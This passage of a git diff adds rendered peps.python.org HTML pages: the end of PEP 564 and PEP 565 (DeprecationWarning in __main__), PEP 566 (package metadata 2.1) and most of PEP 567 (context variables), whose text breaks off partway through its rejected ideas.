The difference between time.perf_counter(), time.monotonic(), +time.process_time() and their respective nanosecond variants is +not visible in this quick script since the script runs for less than 1 +minute, and the uptime of the computer used to run the script was +smaller than 1 week. A significant difference may be seen if uptime +reaches 104 days or more.

+

resource.getrusage() and times() have a resolution greater or +equal to 1 microsecond, and so don’t need a variant with nanosecond +resolution.

+
+

Note

+

Internally, Python starts monotonic() and perf_counter() +clocks at zero on some platforms which indirectly reduce the +precision loss.

+
+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0564.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0565/index.html b/pep-0565/index.html new file mode 100644 index 00000000000..817851c6d29 --- /dev/null +++ b/pep-0565/index.html @@ -0,0 +1,478 @@ + + + + + + + + PEP 565 – Show DeprecationWarning in __main__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 565 – Show DeprecationWarning in __main__

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Nov-2017
+
Python-Version:
+
3.7
+
Post-History:
+
12-Nov-2017, 25-Nov-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.7 and Python 3.2, the default warning filters were updated to hide +DeprecationWarning by default, such that deprecation warnings in development +tools that were themselves written in Python (e.g. linters, static analysers, +test runners, code generators), as well as any other applications that merely +happened to be written in Python, wouldn’t be visible to their users unless +those users explicitly opted in to seeing them.

+

However, this change has had the unfortunate side effect of making +DeprecationWarning markedly less effective at its primary intended purpose: +providing advance notice of breaking changes in APIs (whether in CPython, the +standard library, or in third party libraries) to users of those APIs.

+

To improve this situation, this PEP proposes a single adjustment to the +default warnings filter: displaying deprecation warnings attributed to the main +module by default.

+

This change will mean that code entered at the interactive prompt and code in +single file scripts will revert to reporting these warnings by default, while +they will continue to be silenced by default for packaged code distributed as +part of an importable module.

+

The PEP also proposes a number of small adjustments to the reference +interpreter and standard library documentation to help make the warnings +subsystem more approachable for new Python developers.

+

As part of the documentation updates, it will be made clearer that the +unittest test runner displays all warnings by default when executing +test cases, and that other test runners are advised to follow that example.

+
+
+

Specification

+
+

New default warnings filter entry

+

The current set of default warnings filters consists of:

+
ignore::DeprecationWarning
+ignore::PendingDeprecationWarning
+ignore::ImportWarning
+ignore::BytesWarning
+ignore::ResourceWarning
+
+
+

The default unittest test runner then uses warnings.catch_warnings() +warnings.simplefilter('default') to override the default filters while +running test cases.

+

The change proposed in this PEP is to update the default warning filter list +to be:

+
default::DeprecationWarning:__main__
+ignore::DeprecationWarning
+ignore::PendingDeprecationWarning
+ignore::ImportWarning
+ignore::BytesWarning
+ignore::ResourceWarning
+
+
+

This means that in cases where the nominal location of the warning (as +determined by the stacklevel parameter to warnings.warn) is in the +__main__ module, the first occurrence of each DeprecationWarning will once +again be reported.

+

This change will lead to DeprecationWarning being displayed by default for:

+
    +
  • code executed directly at the interactive prompt
  • +
  • code executed directly as part of a single-file script
  • +
+

While continuing to be hidden by default for:

+
    +
  • code imported from another module in a zipapp archive’s __main__.py +file
  • +
  • code imported from another module in an executable package’s __main__ +submodule
  • +
  • code imported from an executable script wrapper generated at installation time +based on a console_scripts or gui_scripts entry point definition
  • +
+

This means that tool developers that create an installable or executable +artifact (such as a zipapp archive) for distribution to their users +shouldn’t see any change from the status quo, while users of more ad hoc +personal or locally distributed scripts are likely to start seeing relevant +deprecation warnings again (as they did in Python 2.6 and earlier).

+
+
+

Additional use case for FutureWarning

+

The standard library documentation will be updated to explicitly recommend the +use of FutureWarning (rather than DeprecationWarning) for backwards +compatibility warnings that are intended to be seen by users of an +application. (This will be in addition to the existing use of FutureWarning +to warn about constructs that will remain valid code in the future, +but will have different semantics).

+

This will give the following three distinct categories of backwards +compatibility warning, with three different intended audiences:

+
    +
  • PendingDeprecationWarning: hidden by default for all code. +The intended audience is Python developers that take an active interest in +ensuring the future compatibility of their software (e.g. professional +Python application developers with specific support obligations).
  • +
  • DeprecationWarning: reported by default for code that runs directly in +the __main__ module (as such code is considered relatively unlikely to +have a dedicated test suite), but hidden by default for code in other modules. +The intended audience is Python developers that are at risk of upgrades to +their dependencies (including upgrades to Python itself) breaking their +software (e.g. developers using Python to script environments where someone +else is in control of the timing of dependency upgrades).
  • +
  • FutureWarning: reported by default for all code. +The intended audience is users of applications written in Python, rather than +other Python developers (e.g. warning about use of a deprecated setting in a +configuration file format).
  • +
+

For library and framework authors that want to ensure their API compatibility +warnings are more reliably seen by their users, the recommendation is to use a +custom warning class that derives from DeprecationWarning in Python 3.7+, +and from FutureWarning in earlier versions.

+
+ + +
+

Other documentation updates

+

The current reference documentation for the warnings system is relatively short +on specific examples of possible settings for the -W command line option +or the PYTHONWARNINGS environment variably that achieve particular end +results.

+

The following improvements are proposed as part of the implementation of this +PEP:

+
    +
  • Explicitly list the following entries under the description of the +PYTHONWARNINGS environment variable:
    PYTHONWARNINGS=error # Convert to exceptions
    +PYTHONWARNINGS=always # Warn every time
    +PYTHONWARNINGS=default # Warn once per call location
    +PYTHONWARNINGS=module # Warn once per calling module
    +PYTHONWARNINGS=once # Warn once per Python process
    +PYTHONWARNINGS=ignore # Never warn
    +
    +
    +
  • +
  • Explicitly list the corresponding short options +(-We, -Wa, -Wd, -Wm, -Wo, -Wi) for each of the +warning actions listed under the -W command line switch documentation
  • +
  • Explicitly list the default filter set in the warnings module +documentation, using the action::category and action::category:module +notation
  • +
  • Explicitly list the following snippet in the warnings.simplefilter +documentation as a recommended approach to turning off all warnings by +default in a Python application while still allowing them to be turned +back on via PYTHONWARNINGS or the -W command line switch:
    if not sys.warnoptions:
    +    warnings.simplefilter("ignore")
    +
    +
    +
  • +
+

None of these are new (they already work in all still supported Python +versions), but they’re not especially obvious given the current structure +of the related documentation.

+
+
+
+

Reference Implementation

+

A reference implementation is available in the PR [4] linked from the +related tracker issue for this PEP [5].

+

As a side-effect of implementing this PEP, the internal warnings filter list +will start allowing the use of plain strings as part of filter definitions (in +addition to the existing use of compiled regular expressions). When present, +the plain strings will be compared for exact matches only. This approach allows +the new default filter to be added during interpreter startup without requiring +early access to the re module.

+
+
+

Motivation

+

As discussed in [1] and mentioned in [2], Python 2.7 and Python 3.2 changed +the default handling of DeprecationWarning such that:

+
    +
  • the warning was hidden by default during normal code execution
  • +
  • the unittest test runner was updated to re-enable it when running tests
  • +
+

The intent was to avoid cases of tooling output like the following:

+
$ devtool mycode/
+/usr/lib/python3.6/site-packages/devtool/cli.py:1: DeprecationWarning: 'async' and 'await' will become reserved keywords in Python 3.7
+  async = True
+... actual tool output ...
+
+
+

Even when devtool is a tool specifically for Python programmers, this is not +a particularly useful warning, as it will be shown on every invocation, even +though the main helpful step an end user can take is to report a bug to the +developers of devtool.

+

The warning is even less helpful for general purpose developer tools that are +used across more languages than just Python, and almost entirely *un*helpful +for applications that simply happen to be written in Python, and aren’t +necessarily intended for a developer audience at all.

+

However, this change proved to have unintended consequences for the following +audiences:

+
    +
  • anyone using a test runner other than the default one built into unittest +(the request for third party test runners to change their default warnings +filters was never made explicitly, so many of them still rely on the +interpreter defaults that are designed to suit deployed applications)
  • +
  • anyone using the default unittest test runner to test their Python code +in a subprocess (since even unittest only adjusts the warnings settings +in the current process)
  • +
  • anyone writing Python code at the interactive prompt or as part of a directly +executed script that didn’t have a Python level test suite at all
  • +
+

In these cases, DeprecationWarning ended up become almost entirely +equivalent to PendingDeprecationWarning: it was simply never seen at all.

+
+
+

Limitations on PEP Scope

+

This PEP exists specifically to explain both the proposed addition to the +default warnings filter for 3.7, and to more clearly articulate the rationale +for the original change to the handling of DeprecationWarning back in Python 2.7 +and 3.2.

+

This PEP does not solve all known problems with the current approach to handling +deprecation warnings. Most notably:

+
    +
  • The default unittest test runner does not currently report deprecation +warnings emitted at module import time, as the warnings filter override is only +put in place during test execution, not during test discovery and loading.
  • +
  • The default unittest test runner does not currently report deprecation +warnings in subprocesses, as the warnings filter override is applied directly +to the loaded warnings module, not to the PYTHONWARNINGS environment +variable.
  • +
  • The standard library doesn’t provide a straightforward way to opt-in to seeing +all warnings emitted by a particular dependency prior to upgrading it +(the third-party warn module [3] does provide this, but enabling it +involves monkeypatching the standard library’s warnings module).
  • +
  • When software has been factored out into support modules, but those modules +have little or no automated test coverage, re-enabling deprecation warnings +by default in __main__ isn’t likely to help find API compatibility +problems. Near term, the best currently available answer is to run affected +applications with PYTHONWARNINGS=default::DeprecationWarning or +python -W default::DeprecationWarning and pay attention to their +stderr output. Longer term, this is really a question for researchers +working on static analysis of Python code: how to reliably find usage of +deprecated APIs, and how to infer that an API or parameter is deprecated +based on warnings.warn calls, without actually running either the code +providing the API or the code accessing it.
  • +
+

While these are real problems with the status quo, they’re excluded from +consideration in this PEP because they’re going to require more complex +solutions than a single additional entry in the default warnings filter, +and resolving them at least potentially won’t require going through the PEP +process.

+

For anyone interested in pursuing them further, the first two would be +unittest module enhancement requests, the third would be a warnings +module enhancement request, while the last would only require a PEP if +inferring API deprecations from their contents was deemed to be an intractable +code analysis problem, and an explicit function and parameter marker syntax in +annotations was proposed instead.

+

The CPython reference implementation will also include the following related +changes in 3.7:

+ +

Independently of the proposed changes to the default filters in this PEP, +issue 32229 [7] is a proposal to add a warnings.hide_warnings API to +make it simpler for application developers to hide warnings during normal +operation, while easily making them visible when testing.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0565.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0566/index.html b/pep-0566/index.html new file mode 100644 index 00000000000..4cee8e0d9aa --- /dev/null +++ b/pep-0566/index.html @@ -0,0 +1,310 @@ + + + + + + + + PEP 566 – Metadata for Python Software Packages 2.1 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 566 – Metadata for Python Software Packages 2.1

+
+
Author:
+
Dustin Ingram <di at python.org>
+
BDFL-Delegate:
+
Daniel Holth
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
01-Dec-2017
+
Python-Version:
+
3.x
+
Post-History:
+

+
Replaces:
+
345
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes the changes between versions 1.2 and 2.1 of the core +metadata specification for Python packages. Version 1.2 is specified in +PEP 345.

+

It also changes to the canonical source for field specifications to the Core +Metadata Specification reference document, which includes specifics of the +field names, and their semantics and usage.

+
+
+

Fields

+

The canonical source for the names and semantics of each of the supported +metadata fields is the Core Metadata Specification document.

+

Fields marked with “(Multiple use)” may be specified multiple times in a single +PKG-INFO file. Other fields may only occur once in a PKG-INFO file. Fields +marked with “(optional)” are not required to appear in a valid PKG-INFO file; +all other fields must be present.

+
+

New in Version 2.1

+
+

Description-Content-Type (optional)

+

A string stating the markup syntax (if any) used in the distribution’s +description, so that tools can intelligently render the description.

+

Historically, tools like PyPI assume that a package’s description is formatted +in reStructuredText (reST), and +fall back on plain text if the description is not valid reST.

+

The introduction of this field allows PyPI to support additional types of +markup syntax, and not need to make this assumption.

+

The full specification for this field is defined in the Core Metadata +Specification.

+
+
+

Provides-Extra (optional, multiple use)

+

A string containing the name of an optional feature. Must be a valid Python +identifier. May be used to make a dependency conditional on whether the +optional feature has been requested.

+

This introduction of this field allows package installation tools (such as +pip) to determine which extras are provided by a given package, and so that +package publication tools (such as twine) can check for issues with +environment markers which use extras.

+

The full specification for this field is defined in the Core Metadata +Specification.

+
+
+
+

Changed in Version 2.1

+
+

Name

+

The specification for the format of this field is now identical to the +distribution name specification defined in PEP 508.

+
+
+

Description

+

In addition to the Description header field, the distribution’s +description may instead be provided in the message body (i.e., after a +completely blank line following the headers, with no indentation or other +special formatting necessary).

+
+
+
+
+

Version Specifiers

+

Version numbering requirements and the semantics for specifying comparisons +between versions are defined in PEP 440. Direct references as defined in +PEP 440 are also permitted as an alternative to version specifiers.

+

Following PEP 508, version specifiers no longer need to be surrounded by +parentheses in the fields Requires-Dist, Provides-Dist, Obsoletes-Dist or +Requires-External, so e.g. requests >= 2.8.1 is now a valid value. +The recommended format is without parentheses, but tools parsing metadata should +also be able to handle version specifiers in parentheses. Further, public index +servers MAY prohibit strict version matching clauses or direct references in +these fields.

+

Usage of version specifiers is otherwise unchanged from PEP 345.

+
+
+

Environment markers

+

An environment marker is a marker that can be added at the end of a +field after a semi-colon (“;”), to add a condition about the execution +environment.

+

The environment marker format used to declare such a condition is defined in +the environment markers section of PEP 508.

+

Usage of environment markers is otherwise unchanged from PEP 345.

+
+
+

JSON-compatible Metadata

+

It may be necessary to store metadata in a data structure which does not +allow for multiple repeated keys, such as JSON.

+

The canonical method to transform metadata fields into such a data structure is +as follows:

+
    +
  1. The original key-value format should be read with +email.parser.HeaderParser;
  2. +
  3. All transformed keys should be reduced to lower case. Hyphens should be +replaced with underscores, but otherwise should retain all other characters;
  4. +
  5. The transformed value for any field marked with “(Multiple-use”) should be a +single list containing all the original values for the given key;
  6. +
  7. The Keywords field should be converted to a list by splitting the +original value on commas;
  8. +
  9. The message body, if present, should be set to the value of the +description key.
  10. +
  11. The result should be stored as a string-keyed dictionary.
  12. +
+
+
+

Summary of Differences From PEP 345

+
    +
  • Metadata-Version is now 2.1.
  • +
  • Fields are now specified via the Core Metadata Specification.
  • +
  • Added two new fields: Description-Content-Type and Provides-Extra
  • +
  • Acceptable values for the Name field are now specified as per PEP 508.
  • +
  • Added canonical method of transformation into JSON-compatible data structure.
  • +
+
+
+

References

+

This document specifies version 2.1 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345. +Version 2.0, while not formally accepted, was specified in PEP 426.

+
+ +
+

Acknowledgements

+

Thanks to Alyssa Coghlan and Thomas Kluyver for contributing to this PEP.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0566.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0567/index.html b/pep-0567/index.html new file mode 100644 index 00000000000..1f9b4ecf67e --- /dev/null +++ b/pep-0567/index.html @@ -0,0 +1,1004 @@ + + + + + + + + PEP 567 – Context Variables | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 567 – Context Variables

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2017
+
Python-Version:
+
3.7
+
Post-History:
+
12-Dec-2017, 28-Dec-2017, 16-Jan-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new contextvars module and a set of new +CPython C APIs to support context variables. This concept is +similar to thread-local storage (TLS), but, unlike TLS, it also allows +correctly keeping track of values per asynchronous task, e.g. +asyncio.Task.

+

This proposal is a simplified version of PEP 550. The key +difference is that this PEP is concerned only with solving the case +for asynchronous tasks, not for generators. There are no proposed +modifications to any built-in types or to the interpreter.

+

This proposal is not strictly related to Python Context Managers. +Although it does provide a mechanism that can be used by Context +Managers to store their state.

+
+
+

API Design and Implementation Revisions

+

In Python 3.7.1 the signatures of all context variables +C APIs were changed to use PyObject * pointers instead +of PyContext *, PyContextVar *, and PyContextToken *, +e.g.:

+
// in 3.7.0:
+PyContext *PyContext_New(void);
+
+// in 3.7.1+:
+PyObject *PyContext_New(void);
+
+
+

See [6] for more details. The C API section of this PEP was +updated to reflect the change.

+
+
+

Rationale

+

Thread-local variables are insufficient for asynchronous tasks that +execute concurrently in the same OS thread. Any context manager that +saves and restores a context value using threading.local() will +have its context values bleed to other code unexpectedly when used +in async/await code.

+

A few examples where having a working context local storage for +asynchronous code is desirable:

+
    +
  • Context managers like decimal contexts and numpy.errstate.
  • +
  • Request-related data, such as security tokens and request +data in web applications, language context for gettext, etc.
  • +
  • Profiling, tracing, and logging in large code bases.
  • +
+
+
+

Introduction

+

The PEP proposes a new mechanism for managing context variables. +The key classes involved in this mechanism are contextvars.Context +and contextvars.ContextVar. The PEP also proposes some policies +for using the mechanism around asynchronous tasks.

+

The proposed mechanism for accessing context variables uses the +ContextVar class. A module (such as decimal) that wishes to +use the new mechanism should:

+
    +
  • declare a module-global variable holding a ContextVar to +serve as a key;
  • +
  • access the current value via the get() method on the +key variable;
  • +
  • modify the current value via the set() method on the +key variable.
  • +
+

The notion of “current value” deserves special consideration: +different asynchronous tasks that exist and execute concurrently +may have different values for the same key. This idea is well known +from thread-local storage but in this case the locality of the value is +not necessarily bound to a thread. Instead, there is the notion of the +“current Context” which is stored in thread-local storage. +Manipulation of the current context is the responsibility of the +task framework, e.g. asyncio.

+

A Context is a mapping of ContextVar objects to their values. +The Context itself exposes the abc.Mapping interface +(not abc.MutableMapping!), so it cannot be modified directly. +To set a new value for a context variable in a Context object, +the user needs to:

+
    +
  • make the Context object “current” using the Context.run() +method;
  • +
  • use ContextVar.set() to set a new value for the context +variable.
  • +
+

The ContextVar.get() method looks for the variable in the current +Context object using self as a key.

+

It is not possible to get a direct reference to the current Context +object, but it is possible to obtain a shallow copy of it using the +contextvars.copy_context() function. This ensures that the +caller of Context.run() is the sole owner of its Context +object.

+
+
+

Specification

+

A new standard library module contextvars is added with the +following APIs:

+
    +
  1. The copy_context() -> Context function is used to get a copy of +the current Context object for the current OS thread.
  2. +
  3. The ContextVar class to declare and access context variables.
  4. +
  5. The Context class encapsulates context state. Every OS thread +stores a reference to its current Context instance. +It is not possible to control that reference directly. +Instead, the Context.run(callable, *args, **kwargs) method is +used to run Python code in another context.
  6. +
+
+

contextvars.ContextVar

+

The ContextVar class has the following constructor signature: +ContextVar(name, *, default=_NO_DEFAULT). The name parameter +is used for introspection and debug purposes, and is exposed +as a read-only ContextVar.name attribute. The default +parameter is optional. Example:

+
# Declare a context variable 'var' with the default value 42.
+var = ContextVar('var', default=42)
+
+
+

(The _NO_DEFAULT is an internal sentinel object used to +detect if the default value was provided.)

+

ContextVar.get(default=_NO_DEFAULT) returns a value for +the context variable for the current Context:

+
# Get the value of `var`.
+var.get()
+
+
+

If there is no value for the variable in the current context, +ContextVar.get() will:

+
    +
  • return the value of the default argument of the get() method, +if provided; or
  • +
  • return the default value for the context variable, if provided; or
  • +
  • raise a LookupError.
  • +
+

ContextVar.set(value) -> Token is used to set a new value for +the context variable in the current Context:

+
# Set the variable 'var' to 1 in the current context.
+var.set(1)
+
+
+

ContextVar.reset(token) is used to reset the variable in the +current context to the value it had before the set() operation +that created the token (or to remove the variable if it was +not set):

+
# Assume: var.get(None) is None
+
+# Set 'var' to 1:
+token = var.set(1)
+try:
+    # var.get() == 1
+finally:
+    var.reset(token)
+
+# After reset: var.get(None) is None,
+# i.e. 'var' was removed from the current context.
+
+
+

The ContextVar.reset() method raises:

+
    +
  • a ValueError if it is called with a token object created +by another variable;
  • +
  • a ValueError if the current Context object does not match +the one where the token object was created;
  • +
  • a RuntimeError if the token object has already been used once +to reset the variable.
  • +
+
+
+

contextvars.Token

+

contextvars.Token is an opaque object that should be used to +restore the ContextVar to its previous value, or to remove it from +the context if the variable was not set before. It can be created +only by calling ContextVar.set().

+

For debug and introspection purposes it has:

+
    +
  • a read-only attribute Token.var pointing to the variable +that created the token;
  • +
  • a read-only attribute Token.old_value set to the value the +variable had before the set() call, or to Token.MISSING +if the variable wasn’t set before.
  • +
+
+
+

contextvars.Context

+

Context object is a mapping of context variables to values.

+

Context() creates an empty context. To get a copy of the current +Context for the current OS thread, use the +contextvars.copy_context() method:

+
ctx = contextvars.copy_context()
+
+
+

To run Python code in some Context, use Context.run() +method:

+
ctx.run(function)
+
+
+

Any changes to any context variables that function causes will +be contained in the ctx context:

+
var = ContextVar('var')
+var.set('spam')
+
+def main():
+    # 'var' was set to 'spam' before
+    # calling 'copy_context()' and 'ctx.run(main)', so:
+    # var.get() == ctx[var] == 'spam'
+
+    var.set('ham')
+
+    # Now, after setting 'var' to 'ham':
+    # var.get() == ctx[var] == 'ham'
+
+ctx = copy_context()
+
+# Any changes that the 'main' function makes to 'var'
+# will be contained in 'ctx'.
+ctx.run(main)
+
+# The 'main()' function was run in the 'ctx' context,
+# so changes to 'var' are contained in it:
+# ctx[var] == 'ham'
+
+# However, outside of 'ctx', 'var' is still set to 'spam':
+# var.get() == 'spam'
+
+
+

Context.run() raises a RuntimeError when called on the same +context object from more than one OS thread, or when called +recursively.

+

Context.copy() returns a shallow copy of the context object.

+

Context objects implement the collections.abc.Mapping ABC. +This can be used to introspect contexts:

+
ctx = contextvars.copy_context()
+
+# Print all context variables and their values in 'ctx':
+print(ctx.items())
+
+# Print the value of 'some_variable' in context 'ctx':
+print(ctx[some_variable])
+
+
+

Note that all Mapping methods, including Context.__getitem__ and +Context.get, ignore default values for context variables +(i.e. ContextVar.default). This means that for a variable var +that was created with a default value and was not set in the +context:

+
    +
  • context[var] raises a KeyError,
  • +
  • var in context returns False,
  • +
  • the variable isn’t included in context.items(), etc.
  • +
+
+
+

asyncio

+

asyncio uses Loop.call_soon(), Loop.call_later(), +and Loop.call_at() to schedule the asynchronous execution of a +function. asyncio.Task uses call_soon() to run the +wrapped coroutine.

+

We modify Loop.call_{at,later,soon} and +Future.add_done_callback() to accept the new optional context +keyword-only argument, which defaults to the current context:

+
def call_soon(self, callback, *args, context=None):
+    if context is None:
+        context = contextvars.copy_context()
+
+    # ... some time later
+    context.run(callback, *args)
+
+
+

Tasks in asyncio need to maintain their own context that they inherit +from the point they were created at. asyncio.Task is modified +as follows:

+
class Task:
+    def __init__(self, coro):
+        ...
+        # Get the current context snapshot.
+        self._context = contextvars.copy_context()
+        self._loop.call_soon(self._step, context=self._context)
+
+    def _step(self, exc=None):
+        ...
+        # Every advance of the wrapped coroutine is done in
+        # the task's context.
+        self._loop.call_soon(self._step, context=self._context)
+        ...
+
+
+
+
+
+

Implementation

+

This section explains high-level implementation details in +pseudo-code. Some optimizations are omitted to keep this section +short and clear.

+

The Context mapping is implemented using an immutable dictionary. +This allows for a O(1) implementation of the copy_context() +function. The reference implementation implements the immutable +dictionary using Hash Array Mapped Tries (HAMT); see PEP 550 +for analysis of HAMT performance [1].

+

For the purposes of this section, we implement an immutable dictionary +using a copy-on-write approach and the built-in dict type:

+
class _ContextData:
+
+    def __init__(self):
+        self._mapping = dict()
+
+    def __getitem__(self, key):
+        return self._mapping[key]
+
+    def __contains__(self, key):
+        return key in self._mapping
+
+    def __len__(self):
+        return len(self._mapping)
+
+    def __iter__(self):
+        return iter(self._mapping)
+
+    def set(self, key, value):
+        copy = _ContextData()
+        copy._mapping = self._mapping.copy()
+        copy._mapping[key] = value
+        return copy
+
+    def delete(self, key):
+        copy = _ContextData()
+        copy._mapping = self._mapping.copy()
+        del copy._mapping[key]
+        return copy
+
+
+

Every OS thread has a reference to the current Context object:

+
class PyThreadState:
+    context: Context
+
+
+

contextvars.Context is a wrapper around _ContextData:

+
class Context(collections.abc.Mapping):
+
+    _data: _ContextData
+    _prev_context: Optional[Context]
+
+    def __init__(self):
+        self._data = _ContextData()
+        self._prev_context = None
+
+    def run(self, callable, *args, **kwargs):
+        if self._prev_context is not None:
+            raise RuntimeError(
+                f'cannot enter context: {self} is already entered')
+
+        ts: PyThreadState = PyThreadState_Get()
+        self._prev_context = ts.context
+        try:
+            ts.context = self
+            return callable(*args, **kwargs)
+        finally:
+            ts.context = self._prev_context
+            self._prev_context = None
+
+    def copy(self):
+        new = Context()
+        new._data = self._data
+        return new
+
+    # Implement abstract Mapping.__getitem__
+    def __getitem__(self, var):
+        return self._data[var]
+
+    # Implement abstract Mapping.__contains__
+    def __contains__(self, var):
+        return var in self._data
+
+    # Implement abstract Mapping.__len__
+    def __len__(self):
+        return len(self._data)
+
+    # Implement abstract Mapping.__iter__
+    def __iter__(self):
+        return iter(self._data)
+
+    # The rest of the Mapping methods are implemented
+    # by collections.abc.Mapping.
+
+
+

contextvars.copy_context() is implemented as follows:

+
def copy_context():
+    ts: PyThreadState = PyThreadState_Get()
+    return ts.context.copy()
+
+
+

contextvars.ContextVar interacts with PyThreadState.context +directly:

+
class ContextVar:
+
+    def __init__(self, name, *, default=_NO_DEFAULT):
+        self._name = name
+        self._default = default
+
+    @property
+    def name(self):
+        return self._name
+
+    def get(self, default=_NO_DEFAULT):
+        ts: PyThreadState = PyThreadState_Get()
+        try:
+            return ts.context[self]
+        except KeyError:
+            pass
+
+        if default is not _NO_DEFAULT:
+            return default
+
+        if self._default is not _NO_DEFAULT:
+            return self._default
+
+        raise LookupError
+
+    def set(self, value):
+        ts: PyThreadState = PyThreadState_Get()
+
+        data: _ContextData = ts.context._data
+        try:
+            old_value = data[self]
+        except KeyError:
+            old_value = Token.MISSING
+
+        updated_data = data.set(self, value)
+        ts.context._data = updated_data
+        return Token(ts.context, self, old_value)
+
+    def reset(self, token):
+        if token._used:
+            raise RuntimeError("Token has already been used once")
+
+        if token._var is not self:
+            raise ValueError(
+                "Token was created by a different ContextVar")
+
+        ts: PyThreadState = PyThreadState_Get()
+        if token._context is not ts.context:
+            raise ValueError(
+                "Token was created in a different Context")
+
+        if token._old_value is Token.MISSING:
+            ts.context._data = ts.context._data.delete(token._var)
+        else:
+            ts.context._data = ts.context._data.set(token._var,
+                                                    token._old_value)
+
+        token._used = True
+
+
+

Note that the in the reference implementation, ContextVar.get() +has an internal cache for the most recent value, which allows to +bypass a hash lookup. This is similar to the optimization the +decimal module implements to retrieve its context from +PyThreadState_GetDict(). See PEP 550 which explains the +implementation of the cache in great detail.

+

The Token class is implemented as follows:

+
class Token:
+
+    MISSING = object()
+
+    def __init__(self, context, var, old_value):
+        self._context = context
+        self._var = var
+        self._old_value = old_value
+        self._used = False
+
+    @property
+    def var(self):
+        return self._var
+
+    @property
+    def old_value(self):
+        return self._old_value
+
+
+
+
+

Summary of the New APIs

+
+

Python API

+
    +
  1. A new contextvars module with ContextVar, Context, +and Token classes, and a copy_context() function.
  2. +
  3. asyncio.Loop.call_at(), asyncio.Loop.call_later(), +asyncio.Loop.call_soon(), and +asyncio.Future.add_done_callback() run callback functions in +the context they were called in. A new context keyword-only +parameter can be used to specify a custom context.
  4. +
  5. asyncio.Task is modified internally to maintain its own +context.
  6. +
+
+
+

C API

+
    +
  1. PyObject * PyContextVar_New(char *name, PyObject *default): +create a ContextVar object. The default argument can be +NULL, which means that the variable has no default value.
  2. +
  3. int PyContextVar_Get(PyObject *, PyObject *default_value, PyObject **value): +return -1 if an error occurs during the lookup, 0 otherwise. +If a value for the context variable is found, it will be set to the +value pointer. Otherwise, value will be set to +default_value when it is not NULL. If default_value is +NULL, value will be set to the default value of the +variable, which can be NULL too. value is always a new +reference.
  4. +
  5. PyObject * PyContextVar_Set(PyObject *, PyObject *): +set the value of the variable in the current context.
  6. +
  7. PyContextVar_Reset(PyObject *, PyObject *): +reset the value of the context variable.
  8. +
  9. PyObject * PyContext_New(): create a new empty context.
  10. +
  11. PyObject * PyContext_Copy(PyObject *): return a shallow +copy of the passed context object.
  12. +
  13. PyObject * PyContext_CopyCurrent(): get a copy of the current +context.
  14. +
  15. int PyContext_Enter(PyObject *) and +int PyContext_Exit(PyObject *) allow to set and restore +the context for the current OS thread. It is required to always +restore the previous context:
    PyObject *old_ctx = PyContext_Copy();
    +if (old_ctx == NULL) goto error;
    +
    +if (PyContext_Enter(new_ctx)) goto error;
    +
    +// run some code
    +
    +if (PyContext_Exit(old_ctx)) goto error;
    +
    +
    +
  16. +
+
+
+
+

Rejected Ideas

+
+

Replicating threading.local() interface

+

Please refer to PEP 550 where this topic is covered in detail: [2].

+
+
+

Replacing Token with ContextVar.unset()

+

The Token API allows to get around having a ContextVar.unset() +method, which is incompatible with chained contexts design of +PEP 550. Future compatibility with PEP 550 is desired +in case there is demand to support context variables in generators +and asynchronous generators.

+

The Token API also offers better usability: the user does not have +to special-case absence of a value. Compare:

+
token = cv.set(new_value)
+try:
+    # cv.get() is new_value
+finally:
+    cv.reset(token)
+
+
+

with:

+
_deleted = object()
+old = cv.get(default=_deleted)
+try:
+    cv.set(blah)
+    # code
+finally:
+    if old is _deleted:
+        cv.unset()
+    else:
+        cv.set(old)
+
+
+
+
+

Having Token.reset() instead of ContextVar.reset()

+

Nathaniel Smith suggested to implement the ContextVar.reset() +method directly on the Token class, so instead of:

+
token = var.set(value)
+# ...
+var.reset(token)
+
+
+

we would write:

+
token = var.set(value)
+# ...
+token.reset()
+
+
+

Having Token.reset() would make it impossible for a user to +attempt to reset a variable with a token object created by another +variable.

+

This proposal was rejected for the reason of ContextVar.reset() +being clearer to the human reader of the code which variable is +being reset.

+
+
+

Making Context objects picklable

+

Proposed by Antoine Pitrou, this could enable transparent +cross-process use of Context objects, so the +Offloading execution to other threads example would work with +a ProcessPoolExecutor too.

+

Enabling this is problematic because of the following reasons:

+
    +
